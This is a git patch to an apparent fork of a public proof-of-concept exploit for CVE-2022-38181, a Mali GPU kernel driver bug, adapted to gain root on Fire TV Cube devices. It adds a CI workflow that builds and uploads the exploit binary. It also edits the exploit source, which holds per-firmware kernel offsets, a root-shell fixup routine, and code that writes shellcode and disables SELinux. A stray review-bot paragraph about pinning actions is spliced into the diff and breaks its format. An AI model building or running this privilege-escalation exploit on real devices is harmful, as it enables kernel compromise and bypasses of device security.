From 8654c21039fa21c1ac5d44d12d20be02d6dcfc34 Mon Sep 17 00:00:00 2001
From: Syuugo
Date: Wed, 1 May 2024 21:48:34 +0900
Subject: [PATCH] Add build workflow
---
.github/workflows/compile.yml | 27 ++++++++
.gitignore | 1 +
README.md | 2 +-
mali_base_jm_kernel.h | 2 -
mali_shrinker_mmap32.c | 115 +++++++++++++++++----------------
5 files changed, 86 insertions(+), 61 deletions(-)
create mode 100644 .github/workflows/compile.yml
create mode 100644 .gitignore
diff --git a/.github/workflows/compile.yml b/.github/workflows/compile.yml
new file mode 100644
index 0000000..00dd57d
--- /dev/null
+++ b/.github/workflows/compile.yml
@@ -0,0 +1,27 @@
+name: Compile
+
+on:
+ push:
+ paths:
+ - '*.c'
+ - '*.h'
+ - '.github/workflows/compile.yml'
+ workflow_dispatch:
+
+jobs:
+ compile:
+ name: Compile
+ runs-on: ubuntu-latest
+
+ steps:
+ - name: Checkout
+ uses: actions/checkout@v4
+
+ - name: Compile
+ run: $ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_shrinker_mmap32.c -o shrinker
+
+ - name: Uplaod
+ uses: actions/upload-artifact@v4
+ with:
+ name: CVE-2022-38181
+ path: shrinker
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..19dc2d2
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+/shrinker
diff --git a/README.md b/README.md
index de10a89..d11372a 100644
--- a/README.md
+++ b/README.md
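Review bot: The two `uses:` lines in the compile.yml hunk pin `actions/checkout` and `actions/upload-artifact` only to the mutable `v4` tag, so what the job executes and what it publishes as the `shrinker` artifact depends on wherever those tags point at run time; pin each action to a full commit SHA with the tag kept as a trailing comment, e.g. `uses: actions/checkout@<full-commit-sha> # v4`, and add a top-level `permissions:` block (`permissions:` / `  contents: read`) so the job's GITHUB_TOKEN cannot write back to the repository. The `run:` step assumes the runner exports `$ANDROID_NDK`; if that variable is ever absent the command degrades to `/toolchains/...` and fails with an unhelpful not-found error, so a guard such as `test -n "$ANDROID_NDK"` ahead of the compile would make the failure explicit. The step name `Uplaod` is a typo for `Upload`.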
@@ -1,6 +1,6 @@ ## Exploit for CVE-2022-38181 for FireTV 2nd gen Cube -This is a fork of security researcher Man Yue Mo's Pixel 6 POC for CVE_2022_38181. Read his detailed write-up of the vulnerability here. Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root. +This is a fork of security researcher Man Yue Mo's [Pixel 6 POC](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181) for CVE-2022-38181. Read his detailed write-up of the vulnerability [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/). Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root. I used the following command to compile with clang in ndk-21: ``` diff --git a/mali_base_jm_kernel.h b/mali_base_jm_kernel.h index 3f5a460..844c3da 100644 --- a/mali_base_jm_kernel.h +++ b/mali_base_jm_kernel.h @@ -831,7 +831,6 @@ struct base_jd_atom_v2 { // __u8 jobslot; //missing from Bifrost r16p0 base_jd_core_req core_req; // __u8 renderpass_id; //missing from Bifrost r16p0 - }; */ typedef struct base_jd_atom_v2 { @@ -1233,4 +1232,3 @@ struct base_dump_cpu_gpu_counters { }; #endif /* _UAPI_BASE_JM_KERNEL_H_ */ - diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index e8d2e9c..48fe5d5 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c 
@@ -233,7 +233,7 @@ // PS7624/3337 #define SELINUX_ENFORCING_7624_3337 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7624_3337 0x3641c4 +#define SEL_READ_HANDLE_UNKNOWN_7624_3337 0x3641c4 #define INIT_CRED_7624_3337 0x15fb568 #define COMMIT_CREDS_7624_3337 0x4ccb0 #define ADD_INIT_7624_3337 0x9115a000 //add x0, x0, #0x568 @@ -300,7 +300,7 @@ void setup_mali(int fd, int group_id) { struct kbase_ioctl_set_flags set_flags = {0}; if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { err(1, "set flags failed\n"); - } + } } @@ -329,7 +329,7 @@ void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr, uint64_t* gpu_alloc_region) { struct base_jit_alloc_info info = {0}; struct base_jd_atom_v2 atom = {0}; - + info.id = id; info.gpu_alloc_addr = gpu_alloc_addr; info.va_pages = va_pages; @@ -366,7 +366,7 @@ void jit_free(int fd, uint8_t atom_number, uint8_t id) { if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - + } void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) { @@ -648,7 +648,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e struct MALI_JOB_HEADER jh = {0}; jh.is_64b = true; jh.type = MALI_JOB_TYPE_WRITE_VALUE; - + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; payload.type = type; payload.immediate_value = value; 
@@ -743,166 +743,166 @@ void select_offset() { char fingerprint[256]; int len = __system_property_get("ro.build.fingerprint", fingerprint); LOG("fingerprint: %s\n", fingerprint); - + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7212/1333N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7212_1333; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7212_1333; fixup_root_shell(INIT_CRED_7212_1333, COMMIT_CREDS_7212_1333, SEL_READ_HANDLE_UNKNOWN_7212_1333, ADD_INIT_7212_1333, ADD_COMMIT_7212_1333); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7216/1582N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7216_1582; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7216_1582; fixup_root_shell(INIT_CRED_7216_1582, COMMIT_CREDS_7216_1582, SEL_READ_HANDLE_UNKNOWN_7216_1582, ADD_INIT_7216_1582, ADD_COMMIT_7216_1582); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7224/1752N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7224_1752; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7224_1752; fixup_root_shell(INIT_CRED_7224_1752, COMMIT_CREDS_7224_1752, SEL_READ_HANDLE_UNKNOWN_7224_1752, ADD_INIT_7224_1752, ADD_COMMIT_7224_1752); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1853N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7229_1853; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1853; fixup_root_shell(INIT_CRED_7229_1853, COMMIT_CREDS_7229_1853, SEL_READ_HANDLE_UNKNOWN_7229_1853, ADD_INIT_7229_1853, ADD_COMMIT_7229_1853); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1856N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7229_1856; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1856; fixup_root_shell(INIT_CRED_7229_1856, COMMIT_CREDS_7229_1856, SEL_READ_HANDLE_UNKNOWN_7229_1856, ADD_INIT_7229_1856, 
ADD_COMMIT_7229_1856); - return; + return; } - + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2039N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7234_2039; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2039; fixup_root_shell(INIT_CRED_7234_2039, COMMIT_CREDS_7234_2039, SEL_READ_HANDLE_UNKNOWN_7234_2039, ADD_INIT_7234_2039, ADD_COMMIT_7234_2039); - return; + return; } - + if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2042N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7234_2042; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2042; fixup_root_shell(INIT_CRED_7234_2042, COMMIT_CREDS_7234_2042, SEL_READ_HANDLE_UNKNOWN_7234_2042, ADD_INIT_7234_2042, ADD_COMMIT_7234_2042); - return; + return; } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2216N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7242_2216; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2216; fixup_root_shell(INIT_CRED_7242_2216, COMMIT_CREDS_7242_2216, SEL_READ_HANDLE_UNKNOWN_7242_2216, ADD_INIT_7242_2216, ADD_COMMIT_7242_2216); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2896N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7242_2896; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2896; fixup_root_shell(INIT_CRED_7242_2896, COMMIT_CREDS_7242_2896, SEL_READ_HANDLE_UNKNOWN_7242_2896, ADD_INIT_7242_2896, ADD_COMMIT_7242_2896); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2906N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7242_2906; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2906; fixup_root_shell(INIT_CRED_7242_2906, COMMIT_CREDS_7242_2906, SEL_READ_HANDLE_UNKNOWN_7242_2906, ADD_INIT_7242_2906, ADD_COMMIT_7242_2906); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3515N:user/amz-p,release-keys")) { selinux_enforcing = 
SELINUX_ENFORCING_7242_3515; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3515; fixup_root_shell(INIT_CRED_7242_3515, COMMIT_CREDS_7242_3515, SEL_READ_HANDLE_UNKNOWN_7242_3515, ADD_INIT_7242_3515, ADD_COMMIT_7242_3515); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3516N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7242_3516; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3516; fixup_root_shell(INIT_CRED_7242_3516, COMMIT_CREDS_7242_3516, SEL_READ_HANDLE_UNKNOWN_7242_3516, ADD_INIT_7242_3516, ADD_COMMIT_7242_3516); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7273/2625N:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7273_2625; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7273_2625; fixup_root_shell(INIT_CRED_7273_2625, COMMIT_CREDS_7273_2625, SEL_READ_HANDLE_UNKNOWN_7273_2625, ADD_INIT_7273_2625, ADD_COMMIT_7273_2625); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7279.2766N/0023253929472:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7279_2766; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7279_2766; fixup_root_shell(INIT_CRED_7279_2766, COMMIT_CREDS_7279_2766, SEL_READ_HANDLE_UNKNOWN_7279_2766, ADD_INIT_7279_2766, ADD_COMMIT_7279_2766); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2877N/0023723719936:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7285_2877; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2877; fixup_root_shell(INIT_CRED_7285_2877, COMMIT_CREDS_7285_2877, SEL_READ_HANDLE_UNKNOWN_7285_2877, ADD_INIT_7285_2877, ADD_COMMIT_7285_2877); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2880N/0023723720704:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7285_2880; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2880; 
fixup_root_shell(INIT_CRED_7285_2880, COMMIT_CREDS_7285_2880, SEL_READ_HANDLE_UNKNOWN_7285_2880, ADD_INIT_7285_2880, ADD_COMMIT_7285_2880); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2982N/0024126400000:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7292_2982; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2982; fixup_root_shell(INIT_CRED_7292_2982, COMMIT_CREDS_7292_2982, SEL_READ_HANDLE_UNKNOWN_7292_2982, ADD_INIT_7292_2982, ADD_COMMIT_7292_2982); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2984N/0024126400512:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7292_2984; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2984; fixup_root_shell(INIT_CRED_7292_2984, COMMIT_CREDS_7292_2984, SEL_READ_HANDLE_UNKNOWN_7292_2984, ADD_INIT_7292_2984, ADD_COMMIT_7292_2984); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7603.3110N/0025065956864:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7603_3110; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7603_3110; fixup_root_shell(INIT_CRED_7603_3110, COMMIT_CREDS_7603_3110, SEL_READ_HANDLE_UNKNOWN_7603_3110, ADD_INIT_7603_3110, ADD_COMMIT_7603_3110); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7608.3614N/0025468739072:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7608_3614; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7608_3614; fixup_root_shell(INIT_CRED_7608_3614, COMMIT_CREDS_7608_3614, SEL_READ_HANDLE_UNKNOWN_7608_3614, ADD_INIT_7608_3614, ADD_COMMIT_7608_3614); - return; - } + return; + } if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7614.3227N/0025938402048:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7614_3227; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7614_3227; fixup_root_shell(INIT_CRED_7614_3227, COMMIT_CREDS_7614_3227, 
SEL_READ_HANDLE_UNKNOWN_7614_3227, ADD_INIT_7614_3227, ADD_COMMIT_7614_3227); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7624_3337; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7624_3337; fixup_root_shell(INIT_CRED_7624_3337, COMMIT_CREDS_7624_3337, SEL_READ_HANDLE_UNKNOWN_7624_3337, ADD_INIT_7624_3337, ADD_COMMIT_7624_3337); - return; - } - + return; + } + if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7633.3445N/0027347744000:user/amz-p,release-keys")) { selinux_enforcing = SELINUX_ENFORCING_7633_3445; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7633_3445; fixup_root_shell(INIT_CRED_7633_3445, COMMIT_CREDS_7633_3445, SEL_READ_HANDLE_UNKNOWN_7633_3445, ADD_INIT_7633_3445, ADD_COMMIT_7633_3445); - return; + return; } err(1, "unable to match build id\n"); @@ -1009,8 +1009,8 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) { LOG("Found pgd %d, %llx\n", pgd_idx, pgd); atom_number++; write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0])); - write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); - run_enforce(); + write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + run_enforce(); cleanup(mali_fd, pgd); return 0; } @@ -1080,4 +1080,3 @@ Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thi return -1; } #endif -